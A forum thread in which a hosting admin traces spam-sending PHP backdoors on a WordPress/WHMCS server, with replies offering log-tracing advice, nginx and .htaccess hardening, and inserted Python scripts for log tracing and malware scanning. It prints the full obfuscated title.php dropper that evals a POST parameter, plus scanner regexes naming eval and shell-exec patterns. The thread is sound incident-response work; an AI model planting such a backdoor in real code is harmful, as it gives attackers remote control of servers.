PHP injection
Hi, I have one cPanel server with NginX + Apache where there are some Wordpress sites, but there's one that has a lot of injections in it.
Web users are able to create a PHP file and then, with POST, inject thousands of emails using a local account.
I've added some extra security and tried it all, but I can't get it.
Any tips about this?
Thanks.
Comments
pro tip: don't use wordpress.
Track the POST requests in the logs to find out what plugin/theme file they are exploiting and kill it.
copy content, remove cPanel account (yes, REMOVE), recreate the site making sure nothing you add (like themes) has a backdoor, done
A little more information, these are the logs where the injection is done:
137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
This is inside a WHMCS, but it's the latest version and auto-updated. Here is where the user could write the PHP file.
137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
Verification that the file is there...
And then a lot of POST entries with one nice email per post:
202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:24 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:37 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 849 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:56 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:03:08 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 2283 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
Those are likely POST requests to files that were changed or added by the malicious visitor/bot. Track them back in the logs, using IPs, file names, and "POST" to grep things out until you find where it began and what the initial file was. However, keep in mind that logins may be relevant as well as they will also brute force, edit a theme file, and then execute it.
It may help you narrow down the time frame by looking at the modify time on the files, just run "stat [filename]" to grab modify times. Keep in mind that it may be a game of this file made that file which made that file, so you may need to go a ways back.
This is the correct way. But if you forget a file or to fix the original problem, you'll be in the same situation as you are right now. That's why I recommended you to start over again.
There is no "system.php" in gravity forms plugin in the language dir.
http://plugins.svn.wordpress.org/gravity-forms-sticky-list/tags/1.2.12/languages/
Most probably it's the backdoor, where users are able to inject files... But you have to find out from where it came
go to your log files dir and try, see if you can figure out from where it was created:
grep -r "system.php" .
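The two suggestions above (grep the access log for the injected file name, then walk back through the same IP's earlier requests to find the dropper) can be done by hand with grep, but the tracing is easier to get right in a small script. This is an added example, not code from any poster; it parses combined-format access-log lines, finds the first request that touched the known backdoor path, lists the PHP files the same client POSTed to before that moment (the dropper candidates), and lists the IPs that later used the backdoor. The sample log is constructed for the example: the four attacker lines are the ones quoted in this thread, the other three are made-up benign traffic.

```python
"""Trace a planted PHP backdoor back to its dropper in Apache/nginx access logs.

Added example: not code from the thread. Log lines below are constructed (the
ones for 137.175.118.113 and 202.124.242.10 are copied from the thread).
"""
import re
from datetime import datetime

# Combined log format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2015:10:40:02 -0300] "GET /wp-login.php HTTP/1.1" 200 3421 "-" "Mozilla/5.0"
203.0.113.7 - - [27/Apr/2015:10:40:09 -0300] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
137.175.118.113 - - [27/Apr/2015:10:49:20 -0300] "GET /panel/ HTTP/1.0" 200 6120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
202.124.242.10 - - [27/Apr/2015:11:01:57 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 1881 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
202.124.242.10 - - [27/Apr/2015:11:02:07 -0300] "POST /wp-content/plugins/gravityforms/languages/system.php HTTP/1.0" 200 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
"""

BACKDOOR = "/wp-content/plugins/gravityforms/languages/system.php"


def parse_line(line):
    """One log line -> dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["ts"] = datetime.strptime(entry["ts"], "%d/%b/%Y:%H:%M:%S %z")
    entry["status"] = int(entry["status"])
    return entry


def parse_log(lines):
    return [e for e in (parse_line(l) for l in lines) if e is not None]


def first_hit(entries, path):
    """Earliest request to `path` (query string ignored): when the backdoor first shows up."""
    hits = [e for e in entries if e["path"].split("?", 1)[0] == path]
    return min(hits, key=lambda e: e["ts"]) if hits else None


def earlier_requests_from(entries, ip, before):
    """Everything `ip` did before `before`, oldest first; the dropper is usually in here."""
    return sorted((e for e in entries if e["ip"] == ip and e["ts"] < before),
                  key=lambda e: e["ts"])


def dropper_candidates(entries, backdoor_path):
    """PHP files the planting IP POSTed to (with a 200) before the backdoor was first hit."""
    hit = first_hit(entries, backdoor_path)
    if hit is None:
        return []
    prior = earlier_requests_from(entries, hit["ip"], hit["ts"])
    return [e["path"] for e in prior
            if e["method"] == "POST" and e["path"].endswith(".php") and e["status"] == 200]


def operators(entries, backdoor_path):
    """Distinct IPs that POSTed to the backdoor, i.e. whoever used it after it was planted."""
    return sorted({e["ip"] for e in entries
                   if e["method"] == "POST" and e["path"] == backdoor_path})


ENTRIES = parse_log(SAMPLE_LOG.splitlines())

if __name__ == "__main__":
    hit = first_hit(ENTRIES, BACKDOOR)
    print("backdoor first touched by", hit["ip"], "at", hit["ts"])
    print("dropper candidates:", dropper_candidates(ENTRIES, BACKDOOR))
    print("operators:", operators(ENTRIES, BACKDOOR))
```

Run it against the real log by replacing `SAMPLE_LOG.splitlines()` with the opened file; the candidate list then has to be repeated for each dropper it finds (title.php here) until a request to a file that legitimately exists in the install, or a login, is reached. That last hop is the actual entry point; deleting only system.php leaves it open.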
Disable PHP execution for such upload directories. Simple to configure in nginx, standard setup if you follow the WP hardening instructions. For instance (nginx site config)
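An nginx site-config fragment for what that post describes, added here as an example rather than taken from the post or from any WordPress project documentation. It assumes nginx is the frontend and hands PHP to a backend on 127.0.0.1:8080 (the port is an assumption; use whatever your cPanel Apache listens on), and it also assumes the plugin `languages/` directories in your install only ever hold .po/.mo files, as the one in this thread did.

```nginx
# Added example config. Regex locations are matched in file order, so the deny
# blocks must appear BEFORE the generic ~ \.php$ handler or they never fire.

# No PHP may run from directories the web user can write to.
location ~* ^/wp-content/uploads/.*\.(php|php5|php7|phtml|phar)$ {
    deny all;
}

# Assumption: languages/ dirs only contain translation files, never PHP.
location ~* ^/wp-content/plugins/[^/]+/languages/.*\.php$ {
    deny all;
}

# Nothing in wp-includes is meant to be called directly.
location ~* ^/wp-includes/.*\.php$ {
    deny all;
}

# Never serve the config file, even if a misconfiguration would expose it as text.
location = /wp-config.php {
    deny all;
}

# Generic PHP handler: assumption, backend port 8080 (cPanel Apache behind nginx).
location ~ \.php$ {
    proxy_pass http://127.0.0.1:8080;
    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;
}
```

Check it with `nginx -t` and then `curl -I` the system.php path: a 403 instead of a 200 confirms the deny block wins. Note the limit of this control: it shrinks the places a dropped shell can live, but in this thread the dropper ran from /panel/modules/gateways/, a directory that legitimately executes PHP, so this does not replace finding the entry point.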
block China until you figure out a permanent solution
Normally happens when people don't pay for their themes.
He will just get hacked from another part of the world. Or from China, through a proxy.
Would also recommend to start over.
You're forgetting that a lot of these attacks happen on a huge scale; odds are the attacker doesn't care to spend time switching proxies just to get 1 attack back up and running...
I didn't forget. It's just that that specific chinese attacker is for sure not the only one who can attack this bug - or this backdoor (anyone can exploit most of them).
Right now it is the only attack. If you read my post again, it was to temporarily get this attacker off his back, to buy time to fix things.
@funyuns_are_awesome then it will for sure buy time, but OP can not assume he's safe, he still has a backdoor installed
In all of these that I've dealt with, the attacker is only half of the battle as well. Multiple IPs per hour would come in and execute the scripts, from all types of locations. Usually whoever actually caused it, that IP wouldn't be seen again after 24 hours. Working with sometimes up to 30 or so of these events a day at the previous job, the patterns became pretty noticeable.
start over2late
@Hybrid That is because it has been added using a backdoor. https://wordpress.org/news/2015/04/wordpress-4-2-1/
Remove the system.php file and update Wordpress, you should be fine after that.
Hi, I think that the start of the PHP injection is here, the creation of the file:
This is the content of file title.php:
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6fc9cb'])){eval(${$s20}['q6fc9cb']);}?>
Rechecking the logs I saw a POST like this:
137.175.118.113 - - [27/Apr/2015:10:49:41 -0300] "POST /panel/modules/gateways/title.php HTTP/1.0" 200 412 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
After this IP created that file and sent this POST:
137.175.118.113 - - [27/Apr/2015:10:49:42 -0300] "GET /wp-content/plugins/gravityforms/languages/system.php HTTP/1.1" 200 47 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0"
Then I didn't see that IP anymore, but a lot of POSTs started to originate from multiple IPs.
Before that "title.php" I don't know what else to check.
Of course, when I see the attack, I immediately move the injected PHP file and keep checking logs, confirming that all is back to normal after seeing a lot of 404 errors in the Apache logs.
@cassa yes, was the latest version with that vulnerability issue, I just manually upgraded to 4.2.1. I really hope this is the problem.
This has been happening about once or twice per week for the last 5 weeks; I couldn't find a definitive solution to this.
I could see always the injection and the attack, the posts ... but never the source of the problem.
@Jar thanks for the tips, very helpful!
@Traffic that site is full of installs and plugins, if I can avoid that, I will. But if I still don't fix this, I'll have to do that as my latest option.
@Linkking I would never use a patched or nulled theme / script. I know they're full of backdoors
@Hybrid I guess I found when and where it was injected, but still don't know the source of the problem.
@u137 it's not a typical upload PHP file, I can't block access to PHPs, the entire site would stop working. Also, unfortunately, it's a cPanel VPS!
@funyuns_are_awesome yes, the local language of the browsers is Chinese, but attack IPs (using POST) are coming from all around the world, most of them in the USA.
Is that a WHMCS install by chance, where that title.php was? Just the folder structure makes me think of that.
It's a WordPress site installed in root / and WHMCS installed in /panel.
But as far as I can remember, this is random; I mean that other hacks weren't located inside the /panel directory. Not sure right now, but I think so.
Hmm. Something put that there in the WHMCS folder then. I suppose that's as far back as you found grepping the logs for "title.php" though. This isn't a guarantee, but may find some encoded PHP files if any were missed:
http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/
(Codes didn't paste well, the stuff in that article is good though, but may also find legit files)
Sorry to make you work more! That uneasy feeling, it feels irresponsible not to say it
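The linked article's code did not survive the paste, so here is an added example of the same idea, written for this thread rather than taken from that article or from anyone's post: a scanner that walks a web root, flags PHP files matching the obfuscation patterns seen in the title.php dropper quoted above, and reports each hit with its modify time so it can be lined up against the access log. The one-liner is worth decoding because the scanner's regexes are built from it: `$qV` is `"stop_"`, and indexes 4,3,2,0,1 spell `_post`; `strtoupper` makes that `_POST`, so `${$s20}['q6fc9cb']` is `$_POST['q6fc9cb']`, which goes straight into `eval`. `resolve_char_shuffle` reproduces that string assembly without executing anything. The sample files written by `demo()` are constructed (title.php is the content from the thread; header.php is a made-up benign file).

```python
"""Find obfuscated PHP droppers/backdoors like the one quoted in this thread.

Added example, not code from the thread or from the linked article.
"""
import os
import re
import tempfile
from datetime import datetime

# The dropper body posted in the thread, and a constructed benign file.
TITLE_PHP = ('<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);'
             "if(isset(${$s20}['q6fc9cb'])){eval(${$s20}['q6fc9cb']);}?>")
BENIGN_PHP = "<?php echo esc_html(get_option('blogname')); ?>"

# Each pattern alone has false positives; a file matching two or more is worth a look.
SUSPICIOUS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("variable-variable", re.compile(r"\$\{\s*\$\w+\s*\}")),           # ${$s20}
    ("char-shuffle", re.compile(r"\$\w+\[\d+\]\s*\.\s*\$\w+\[\d+\]")),  # $qV[4].$qV[3]
    ("base64", re.compile(r"\bbase64_decode\s*\(")),
    ("inflate", re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("preg-e", re.compile(r"""preg_replace\s*\(\s*['"][^'"]*/[a-z]*e[a-z]*['"]""")),
    ("request-exec", re.compile(
        r"\b(system|passthru|shell_exec|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)")),
]

STR_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')
INDEX_CHAIN = re.compile(r"((?:\$\w+\[\d+\]\s*\.?\s*)+)")


def scan_source(src):
    """Names of the SUSPICIOUS patterns that occur in one file's source."""
    return [name for name, rx in SUSPICIOUS if rx.search(src)]


def resolve_char_shuffle(src):
    """Rebuild strings assembled from indexed characters of a string constant."""
    consts = dict(STR_ASSIGN.findall(src))
    resolved = []
    for chain in INDEX_CHAIN.findall(src):
        parts = re.findall(r"\$(\w+)\[(\d+)\]", chain)
        try:
            resolved.append("".join(consts[var][int(i)] for var, i in parts))
        except (KeyError, IndexError):
            continue  # index into something that is not a known string literal
    return resolved


def scan_tree(root, min_hits=2):
    """(path, mtime, hits) for every PHP file with at least `min_hits` patterns, oldest first."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".php5", ".php7", ".phtml", ".phar")):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_source(fh.read())
            except OSError:
                continue
            if len(hits) >= min_hits:
                mtime = datetime.fromtimestamp(os.path.getmtime(path))
                findings.append((path, mtime, hits))
    return sorted(findings, key=lambda f: f[1])


def demo():
    """Write the two samples into a temporary tree, scan it, return flagged basenames."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "panel", "modules", "gateways"))
        os.makedirs(os.path.join(root, "wp-content", "themes", "x"))
        with open(os.path.join(root, "panel", "modules", "gateways", "title.php"), "w") as fh:
            fh.write(TITLE_PHP)
        with open(os.path.join(root, "wp-content", "themes", "x", "header.php"), "w") as fh:
            fh.write(BENIGN_PHP)
        return [os.path.basename(p) for p, _, _ in scan_tree(root)]


if __name__ == "__main__":
    print("title.php builds:", resolve_char_shuffle(TITLE_PHP))
    print("flagged:", demo())
```

Point `scan_tree` at the account's document root and compare each mtime with the first request to that path in the log; expect some legitimate minified plugin code to trip `base64` or `eval` on its own, which is why the default asks for two patterns.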
I just sent you a PM now abt this ... hehehe.
Also the link you're suggesting is compromised! My local antivirus won't allow me to access it! LOL
http://snag.gy/IuKoS.jpg
Older Gravity forms plugin has issues. See https://blog.sucuri.net/2015/02/malware-cleanup-to-arbitrary-file-upload-in-gravity-forms.html
Do you use mod_sec for Apache? If not, you should.
Add this to wp-content/uploads/.htaccess (remove the spaces in the "Files" entry):
wp-content/.htaccess
Deny access to wp-config.php file. Add this to the root of the web server: .htaccess
mod_Sec : Example of blocking links that contain _input__test.php or _input__test.php5
mod_Sec : Blocking wp-config.php on links
@hdpixel, thanks for this useful information, I already updated the .htaccess files in every directory.
My frontend is NginX, so I don't think mod_sec would work.
Cheers !
Try install wordfence in wordpress.
Wordfence has been there since the beginning
Sometimes I see this in the log:
109.236.88.29 - - [28/Apr/2015:09:12:38 -0300] "GET / HTTP/1.0" 200 60960 "-" "ANTIPIDERSIA"
Sounds like "The bad guy" taking a look
With wordfence, find out what's files changed.